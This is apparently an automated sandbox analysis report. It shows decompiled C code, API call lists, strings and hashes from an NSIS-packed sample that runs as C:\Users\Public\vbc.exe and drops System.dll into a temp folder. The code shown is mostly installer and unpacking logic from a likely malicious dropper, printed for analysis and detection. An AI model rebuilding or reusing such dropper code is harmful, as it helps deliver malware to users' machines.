				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f454;
				_t17 = E00406656(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a8b8;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00406134(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a8b8, 0);
					__eflags =  *0x42a8b8;
					if(__eflags == 0) {
						E00406134(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a8b8, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E004061AB("1033",  *_t17() & 0x0000ffff);
				}
				E00403D25(_t71, _t84);
				_t80 = "C:\\Users\\Albus\\AppData\\Local\\Temp";
				 *0x42f4e0 =  *0x42f45c & 0x00000020;
				 *0x42f4fc = 0x10000;
				if(E00405CD3(_t84, "C:\\Users\\Albus\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405CD3(_t92, _t80) == 0) {
						E004062E0(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f440, 0x67, 1, 0, 0, 0x8040);
					 *0x42ec28 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D25(_t71, __eflags);
							__eflags =  *0x42f500;
							if( *0x42f500 != 0) {
								_t28 = E00405446(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ec0c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a898, 5); // executed
							_t34 = E004065E8("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E004065E8("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebe0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebe0);
								 *0x42ec04 = _t81;
								RegisterClassA(0x42ebe0);
							}
							_t36 =  *0x42ec20; // 0x0
							_t39 = DialogBoxParamA( *0x42f440, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DFD, 0); // executed
							E004039B0(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f440;
						 *0x42ebe4 = E00401000;
						 *0x42ebf0 =  *0x42f440;
						 *0x42ebf4 = _t25;
						 *0x42ec04 = 0x40a210;
						if(RegisterClassA(0x42ebe0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a898 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f440, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3e0;
					E00406134(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f498, 0x42e3e0, 0);
					_t57 =  *0x42e3e0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3e1;
						 *((char*)(E00405C10(0x42e3e1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E0040624D(_t80, E00405BE5(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C2C(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                                                                                                                                          0x00403a66
                                                                                                                                                                                                          0x00403a6f
                                                                                                                                                                                                          0x00403a76
                                                                                                                                                                                                          0x00403a78
                                                                                                                                                                                                          0x00403a8c
                                                                                                                                                                                                          0x00403a9e
                                                                                                                                                                                                          0x00403aa5
                                                                                                                                                                                                          0x00403aac
                                                                                                                                                                                                          0x00403ab2
                                                                                                                                                                                                          0x00403ab7
                                                                                                                                                                                                          0x00403abd
                                                                                                                                                                                                          0x00403ad0
                                                                                                                                                                                                          0x00403ad0
                                                                                                                                                                                                          0x00403adb
                                                                                                                                                                                                          0x00403a7a
                                                                                                                                                                                                          0x00403a85
                                                                                                                                                                                                          0x00403a85
                                                                                                                                                                                                          0x00403ae0
                                                                                                                                                                                                          0x00403aea
                                                                                                                                                                                                          0x00403af3
                                                                                                                                                                                                          0x00403af8
                                                                                                                                                                                                          0x00403b09
                                                                                                                                                                                                          0x00403b90
                                                                                                                                                                                                          0x00403b98
                                                                                                                                                                                                          0x00403ba1
                                                                                                                                                                                                          0x00403ba1
                                                                                                                                                                                                          0x00403bb7
                                                                                                                                                                                                          0x00403bbd
                                                                                                                                                                                                          0x00403bcb
                                                                                                                                                                                                          0x00403c4c
                                                                                                                                                                                                          0x00403c54
                                                                                                                                                                                                          0x00403c5e
                                                                                                                                                                                                          0x00403c63
                                                                                                                                                                                                          0x00403c69
                                                                                                                                                                                                          0x00403cf3
                                                                                                                                                                                                          0x00403cf8
                                                                                                                                                                                                          0x00403cfa
                                                                                                                                                                                                          0x00403d16
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403d16
                                                                                                                                                                                                          0x00403cfc
                                                                                                                                                                                                          0x00403d02
                                                                                                                                                                                                          0x00403d0a
                                                                                                                                                                                                          0x00403d0a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403d02
                                                                                                                                                                                                          0x00403c77
                                                                                                                                                                                                          0x00403c82
                                                                                                                                                                                                          0x00403c87
                                                                                                                                                                                                          0x00403c89
                                                                                                                                                                                                          0x00403c90
                                                                                                                                                                                                          0x00403c90
                                                                                                                                                                                                          0x00403c9b
                                                                                                                                                                                                          0x00403ca3
                                                                                                                                                                                                          0x00403ca5
                                                                                                                                                                                                          0x00403ca7
                                                                                                                                                                                                          0x00403cb0
                                                                                                                                                                                                          0x00403cb3
                                                                                                                                                                                                          0x00403cb9
                                                                                                                                                                                                          0x00403cb9
                                                                                                                                                                                                          0x00403cbf
                                                                                                                                                                                                          0x00403cd8
                                                                                                                                                                                                          0x00403ce9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403cee
                                                                                                                                                                                                          0x00403c56
                                                                                                                                                                                                          0x00403c58
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403bcd
                                                                                                                                                                                                          0x00403bcd
                                                                                                                                                                                                          0x00403bd9
                                                                                                                                                                                                          0x00403be3
                                                                                                                                                                                                          0x00403be9
                                                                                                                                                                                                          0x00403bee
                                                                                                                                                                                                          0x00403bfd
                                                                                                                                                                                                          0x00403d1b
                                                                                                                                                                                                          0x00403d1b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403d1b
                                                                                                                                                                                                          0x00403c0c
                                                                                                                                                                                                          0x00403c47
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403c47
                                                                                                                                                                                                          0x00403b0f
                                                                                                                                                                                                          0x00403b0f
                                                                                                                                                                                                          0x00403b12
                                                                                                                                                                                                          0x00403b14
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403b1e
                                                                                                                                                                                                          0x00403b2e
                                                                                                                                                                                                          0x00403b33
                                                                                                                                                                                                          0x00403b3a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403b3e
                                                                                                                                                                                                          0x00403b40
                                                                                                                                                                                                          0x00403b4d
                                                                                                                                                                                                          0x00403b4d
                                                                                                                                                                                                          0x00403b55
                                                                                                                                                                                                          0x00403b5b
                                                                                                                                                                                                          0x00403b83
                                                                                                                                                                                                          0x00403b8b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403b6d
                                                                                                                                                                                                          0x00403b6e
                                                                                                                                                                                                          0x00403b77
                                                                                                                                                                                                          0x00403b7d
                                                                                                                                                                                                          0x00403b7e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403b7e
                                                                                                                                                                                                          0x00403b79
                                                                                                                                                                                                          0x00403b7b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403b7b
                                                                                                                                                                                                          0x00403b5b

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                                                                                                                                            • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?,?,?,004034F9,0000000B), ref: 00406683
                                                                                                                                                                                                          • lstrcatA.KERNEL32(1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,76712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\vbc.exe" ,00000000), ref: 00403ADB
                                                                                                                                                                                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,76712754), ref: 00403B50
                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
                                                                                                                                                                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403BB7
                                                                                                                                                                                                            • Part of subcall function 004061AB: wsprintfA.USER32 ref: 004061B8
                                                                                                                                                                                                          • RegisterClassA.USER32(0042EBE0), ref: 00403BF4
                                                                                                                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C0C
                                                                                                                                                                                                          • CreateWindowExA.USER32 ref: 00403C41
                                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403C77
                                                                                                                                                                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBE0), ref: 00403CA3
                                                                                                                                                                                                          • GetClassInfoA.USER32(00000000,RichEdit,0042EBE0), ref: 00403CB0
                                                                                                                                                                                                          • RegisterClassA.USER32(0042EBE0), ref: 00403CB9
                                                                                                                                                                                                          • DialogBoxParamA.USER32 ref: 00403CD8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                          • String ID: "C:\Users\Public\vbc.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$B
                                                                                                                                                                                                          • API String ID: 1975747703-380263065
                                                                                                                                                                                                          • Opcode ID: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
                                                                                                                                                                                                          • Instruction ID: 8734c0f5f73e26911640e72846d54346a9337973c4420bd4a4a6803de24d7ebf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B61C6702042007EE620BF669D46F373AACDB4474DF94443FF945B62E2CA7DA9068A2D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 208memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                          			E00402EF1(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				intOrPtr _t100;
				void* _t104;
				intOrPtr _t105;
				long _t106;
				long _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x42f450 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\Public\\vbc.exe", 0x400);
				_t104 = E00405DE6("C:\\Users\\Public\\vbc.exe", 0x80000000, 3);
				 *0x40a018 = _t104;
				if(_t104 == 0xffffffff) {
					return "Error launching installer";
				}
				E0040624D("C:\\Users\\Public", "C:\\Users\\Public\\vbc.exe");
				E0040624D(0x437000, E00405C2C("C:\\Users\\Public"));
				_t54 = GetFileSize(_t104, 0);
				 *0x429470 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402E52(1);
					if( *0x42f458 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						_t105 = 8;
						 *0x415458 = 0x40d450;
						 *0x415454 = 0x40d450;
						 *0x40b8b0 = _t105;
						 *0x40bdcc = 0;
						 *0x40bdc8 = 0;
						 *0x415450 = 0x415450; // executed
						E00405E15( &_v300, "C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E0040343E( *0x42f458 + 0x1c);
							 *0x429474 = _t65;
							 *0x429468 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E004031B7(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x42f454 = _t110;
								 *0x42f45c =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x42f460 =  *0x42f460 + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t100 = _t105;
								do {
									_t70 = _t70 - _t105;
									 *_t70 =  *_t70 + _t110;
									_t100 = _t100 - 1;
								} while (_t100 != 0);
								 *((intOrPtr*)(_t110 + 0x3c)) =  *0x429464;
								E00405DA1(0x42f480, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E0040343E( *0x429460);
					if(E00403428( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42f458) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						if(E00403428(0x421460, _t106) == 0) {
							E00402E52(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42f458 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402E52(0);
							}
							goto L19;
						}
						E00405DA1( &_v40, 0x421460, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42f500 =  *0x42f500 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42f458 =  *0x429460;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x429470) {
							_v8 = E0040670D(_v8, 0x421460, _t106);
						}
						 *0x429460 =  *0x429460 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 != 0);
					goto L22;
				}
			}




























                                                                                                                                                                                                          0x00402eff
                                                                                                                                                                                                          0x00402f02
                                                                                                                                                                                                          0x00402f1c
                                                                                                                                                                                                          0x00402f21
                                                                                                                                                                                                          0x00402f34
                                                                                                                                                                                                          0x00402f39
                                                                                                                                                                                                          0x00402f3f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00402f41
                                                                                                                                                                                                          0x00402f52
                                                                                                                                                                                                          0x00402f63
                                                                                                                                                                                                          0x00402f6a
                                                                                                                                                                                                          0x00402f72
                                                                                                                                                                                                          0x00402f77
                                                                                                                                                                                                          0x00402f79
                                                                                                                                                                                                          0x00403067
                                                                                                                                                                                                          0x00403069
                                                                                                                                                                                                          0x00403075
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040307e
                                                                                                                                                                                                          0x004030aa
                                                                                                                                                                                                          0x004030af
                                                                                                                                                                                                          0x004030b5
                                                                                                                                                                                                          0x004030be
                                                                                                                                                                                                          0x004030bf
                                                                                                                                                                                                          0x004030c4
                                                                                                                                                                                                          0x004030d5
                                                                                                                                                                                                          0x004030db
                                                                                                                                                                                                          0x004030e1
                                                                                                                                                                                                          0x004030e7
                                                                                                                                                                                                          0x004030f1
                                                                                                                                                                                                          0x0040310c
                                                                                                                                                                                                          0x00403115
                                                                                                                                                                                                          0x0040311a
                                                                                                                                                                                                          0x00403139
                                                                                                                                                                                                          0x00403149
                                                                                                                                                                                                          0x0040315b
                                                                                                                                                                                                          0x00403160
                                                                                                                                                                                                          0x00403168
                                                                                                                                                                                                          0x00403175
                                                                                                                                                                                                          0x0040317d
                                                                                                                                                                                                          0x00403182
                                                                                                                                                                                                          0x00403184
                                                                                                                                                                                                          0x00403184
                                                                                                                                                                                                          0x0040318a
                                                                                                                                                                                                          0x0040318a
                                                                                                                                                                                                          0x0040318d
                                                                                                                                                                                                          0x0040318f
                                                                                                                                                                                                          0x0040318f
                                                                                                                                                                                                          0x00403191
                                                                                                                                                                                                          0x00403193
                                                                                                                                                                                                          0x00403193
                                                                                                                                                                                                          0x0040319d
                                                                                                                                                                                                          0x004031a9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004031ae
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403168
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040311c
                                                                                                                                                                                                          0x00403086
                                                                                                                                                                                                          0x00403098
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00402f7f
                                                                                                                                                                                                          0x00402f7f
                                                                                                                                                                                                          0x00402f84
                                                                                                                                                                                                          0x00402f88
                                                                                                                                                                                                          0x00402f8f
                                                                                                                                                                                                          0x00402f96
                                                                                                                                                                                                          0x00402f98
                                                                                                                                                                                                          0x00402f98
                                                                                                                                                                                                          0x00402fa7
                                                                                                                                                                                                          0x00403128
                                                                                                                                                                                                          0x0040316a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040316a
                                                                                                                                                                                                          0x00402fb3
                                                                                                                                                                                                          0x00403037
                                                                                                                                                                                                          0x0040303a
                                                                                                                                                                                                          0x0040303f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403037
                                                                                                                                                                                                          0x00402fc0
                                                                                                                                                                                                          0x00402fc5
                                                                                                                                                                                                          0x00402fcd
                                                                                                                                                                                                          0x00402ff3
                                                                                                                                                                                                          0x00403002
                                                                                                                                                                                                          0x00403008
                                                                                                                                                                                                          0x0040300d
                                                                                                                                                                                                          0x00403013
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040301d
                                                                                                                                                                                                          0x00403025
                                                                                                                                                                                                          0x00403028
                                                                                                                                                                                                          0x0040302d
                                                                                                                                                                                                          0x0040302f
                                                                                                                                                                                                          0x0040302f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040301d
                                                                                                                                                                                                          0x00403040
                                                                                                                                                                                                          0x00403046
                                                                                                                                                                                                          0x00403056
                                                                                                                                                                                                          0x00403056
                                                                                                                                                                                                          0x00403059
                                                                                                                                                                                                          0x0040305f
                                                                                                                                                                                                          0x0040305f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00402f7f

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetTickCount.KERNEL32(76712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00402F05
                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\vbc.exe,00000400), ref: 00402F21
                                                                                                                                                                                                            • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405DEA
                                                                                                                                                                                                            • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00402F6A
                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,0040A130), ref: 004030AF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                          • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                                                          • API String ID: 2803837635-1404970732
                                                                                                                                                                                                          • Opcode ID: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                                                                                                                                                                          • Instruction ID: e8b4360117e31fb5ea1b260af931ada4a8b54667cc236f60df091846fad1fe42
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B471D171A00204ABDB20AF64DD45B9A7BB8EB14719F60803BE505BB2D1D77CAE468B5C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                          			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C52(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405BE5(E0040624D(0x40a450, "C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x40a450);
					E0040624D();
				}
				E00406528(0x40a450);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E004065C1(0x40a450);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405DC1(0x40a450);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DE6(0x40a450, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00405374(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4e8;
						goto L32;
					} else {
						E0040624D(0x40ac50, 0x430000);
						E0040624D(0x430000, 0x40a450);
						E004062E0(_t75, 0x40ac50, 0x40a450, "C:\Users\Albus\AppData\Local\Temp\nsqE488.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E0040624D(0x430000, 0x40ac50);
						_t62 = E00405969("C:\Users\Albus\AppData\Local\Temp\nsqE488.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4e8 =  &( *0x42f4e8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x40a450);
								_push(0xfffffffa);
								E00405374();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00405374(0xffffffea,  *(_t85 - 8));
				 *0x42f514 =  *0x42f514 + 1;
				_t43 = E004031B7(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
				 *0x42f514 =  *0x42f514 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffee);
					} else {
						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffe9);
						lstrcatA(0x40a450,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x40a450);
					E00405969();
					goto L29;
				}
				goto L33;
			}
















                                                                                                                                                                                                          0x00401759
                                                                                                                                                                                                          0x00401760
                                                                                                                                                                                                          0x00401769
                                                                                                                                                                                                          0x0040176c
